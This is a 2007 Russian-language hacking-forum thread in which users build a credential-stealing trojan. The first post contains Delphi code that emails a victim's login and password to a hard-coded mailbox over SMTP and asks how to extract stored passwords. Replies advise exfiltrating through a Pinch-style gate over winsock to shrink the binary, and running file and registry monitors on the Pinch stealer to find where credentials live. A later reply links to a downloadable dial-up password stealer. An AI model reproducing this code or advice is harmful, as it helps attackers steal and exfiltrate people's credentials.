Dial-up + Trojan + Delphi

Discussion in 'С/С++, C#, Rust, Swift, Go, Java, Perl, Ruby' started by Woldemar, 2 May 2007.

  1. Woldemar

    Woldemar Member

    Joined:
    9 Jun 2005
    Messages:
    33
    Likes Received:
    5
    Reputations:
    3
    Доброго дня,

    с кооперируемся и поможем мне :)

    смотрите что есть :
    PHP:
    procedure TForm2.btn1Click(SenderTObject);
    var
      
    msgTIdMessage;
    begin
      Memo1
    .Clear;
      if (
    cbb1.Text '') or (edt1.Text ''then
        
    Exit;
      
    btn1.Enabled:= False;
      
    btn2.Enabled:= False;
      
    IdSMTP1.UserId:= 'имя@mail.ru';
      
    IdSMTP1.Password:= 'пароль'
      
    IdSMTP1.Host:= 'smtp.mail.ru';
      
    IdSMTP1.AuthenticationType:= atLogin;
      
    msg:= TIdMessage.Create(IdSMTP1);
      
    msg.Subject:= 'Что то жертвы: ' cbb1.Text;
      
    msg.Recipients.EMailAddresses:= 'кому@rambler.ru';
      
    msg.From.Address:= 'откого@mail.ru';
      
    Memo1.Lines.Add('|=====================|');
      
    Memo1.Lines.Add('     Чтото жертвы: ' cbb1.Text);
      
    Memo1.Lines.Add('     Пароль Жертвы: ' edt1.Text);
      
    memo1.Lines.Add('|=====================|');
      
    msg.Body.Text:= Memo1.Text;
    {  
    dialup.login:= ;
      
    dialup.Password:= '';
      try
       
    dialup.Login(0);
      
    except
        
    Exit;
      
    end; }
      try
        
    IdSMTP1.Connect(); //Ñîåäèíåíèå
        
    IdSMTP1.Send(msg);  //Îòïðàâêà
        
    Exit;
      finally
        
    IdSMTP1.Disconnect;  //Îòêëþ÷åíèå
        
    btn1.Enabled:= False;
        
    btn2.Enabled:= False;
      
    end;
    end;
    Вопрос:

    Каким образом можно вытягивать пароли из системы?
    Сложно будет кому то впарить такое но все же нужно!
     
    1 person likes this.
  2. slesh

    slesh Elder - Старейшина

    Joined:
    5 Mar 2007
    Messages:
    2,702
    Likes Received:
    1,224
    Reputations:
    455
    Мне кажется что с мылом - чуток туповато. Т.к. простой дикомпил этого создания покажет куда что шлется и с каким паролем. И этот потовый ящик может поиметь любой с более менее ровными руками. Да к томуже и размер будет, даже если сжать UPX'ом, порядком более 200 килобайт!
    Мой тебе совет: для отправки данных лучше юзай типа гейта от пинча. Во первых - никаких паролей которые можно спереть, а во вторых можно напрямую через winsock всё сделать без всяких VCL и тогда размер будет в пределах 40 килобайт. А если убраль лишние модули и заменить их своими(типа sysutils) то размер можно получить порядка 20 килобайт.
    -----------
    А на счет паролей - погляди что делает пинч. К примеру поставь файловый монитор и монитор реестра и запусти пинч и увидешь к чему он лезит. А там дела техники. Вобщем разобраться с можешь быстро что и откуда нужно тырить!
     
    1 person likes this.
  3. Woldemar

    Woldemar Member

    Joined:
    9 Jun 2005
    Messages:
    33
    Likes Received:
    5
    Reputations:
    3
    Ok! Погляжу
     
  4. ProTeuS

    ProTeuS --

    Joined:
    26 Nov 2004
    Messages:
    1,239
    Likes Received:
    542
    Reputations:
    445
    оппа, это ж сорцы моего приватного троя, откуда они у тебя?
     
    1 person likes this.
  5. slesh

    slesh Elder - Старейшина

    Joined:
    5 Mar 2007
    Messages:
    2,702
    Likes Received:
    1,224
    Reputations:
    455
    2 ProTeuS :-D :-D
     
  6. Woldemar

    Woldemar Member

    Joined:
    9 Jun 2005
    Messages:
    33
    Likes Received:
    5
    Reputations:
    3
    Сорцы не сорсы лучша помоги братьям по разуму ЫЫ :D
     
  7. Nix*

    Nix* Banned

    Joined:
    22 Apr 2007
    Messages:
    9
    Likes Received:
    12
    Reputations:
    -18
    Лучше фтп...
    Поставь гейт от Nuklaer.(Только немного измени его)
     
  8. W!z@rD

    W!z@rD Борец за русский язык

    Joined:
    12 Feb 2006
    Messages:
    973
    Likes Received:
    290
    Reputations:
    43
    вот держи...
    Прога написанна на API... так что проблемы с 200 кб отпадают )))
    1. Ворует Dual-UP пассы.
    2. Отправляет на указанное мыло которое прошито в теле проги!!! Так что предется перекомпилировать )

    www.tcpv.narod.ru/DialRIP.7z
     
  9. Woldemar

    Woldemar Member

    Joined:
    9 Jun 2005
    Messages:
    33
    Likes Received:
    5
    Reputations:
    3
    Спасибо всем :)